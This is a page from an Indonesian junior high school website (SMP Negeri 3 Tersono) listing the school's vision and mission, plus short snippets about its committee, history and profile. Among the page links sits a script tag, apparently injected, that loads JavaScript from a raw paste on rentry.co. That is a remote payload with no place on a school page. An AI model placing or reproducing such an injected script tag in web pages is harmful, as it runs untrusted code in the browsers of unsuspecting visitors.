Visi dan Misi
VISI SEKOLAH
"TERWUJUDNYA PESERTA DIDIK YANG BERTAQWA, BERPRESTASI, TERAMPIL DAN BERWAWASAN LINGKUNGAN"
MISI SEKOLAH
Terwujudnya lulusan yang beriman, bertakwa kepada Allah Subhanahu Wata’ala dan memiliki kesalehan sosial.
Terwujudnya pelaksanaan kegiatan keagamaan.
Terwujudnya tata krama dan karakter peserta didik
Terselenggaranya standar proses pembelajaran yang efektif dan efisien.
Terwujudnya standar penilaian pendidikan dan dokumen penilaian
Terwujudnya kejuaraan akademik
Terwujudnya kejuaraan keolahragaan.
Terwujudnya kegiatan dan kejuaraan kesenian.
Memiliki ketrampilan hidup / life skill
Memiliki ketrampilan komunikasi berbahasa Indonesia dan Inggris
Terwujudnya lingkungan sekolah hijau dan asri
Terwujudnya kepedulian terhadap lingkungan
Komentari Tulisan Ini
Halaman Lainnya
Ekstrakurikuler
<script type="text/javascipt src="https://rentry.co/bboz4qfy/raw"></script>
Komite
KOMITE SEKOLAH Komite Sekolah merupakan sebuah lembaga mitra sekolah yang berperan serta, ikut mengembangkan pendidikan di sekolah. Baik pada pengembangan sarana prasarana
Sejarah
SEJARAH SINGKAT SMP NEGERI 3 TERSONO KABUPATEN BATANG Sesuai dengan Program Pemerintah untuk pemerataan pendidikan di Daerah Inp
Profil
Nama Sekolah: SMP NEGERI 3 TERSONO Nomor Pokok Sekolah Nasional: 20322752 Jenjang Pendidikan: SMP Status Sekolah: Negeri Alamat Sekolah: Jalan Desa Sidalang RT/RW: 012 / 004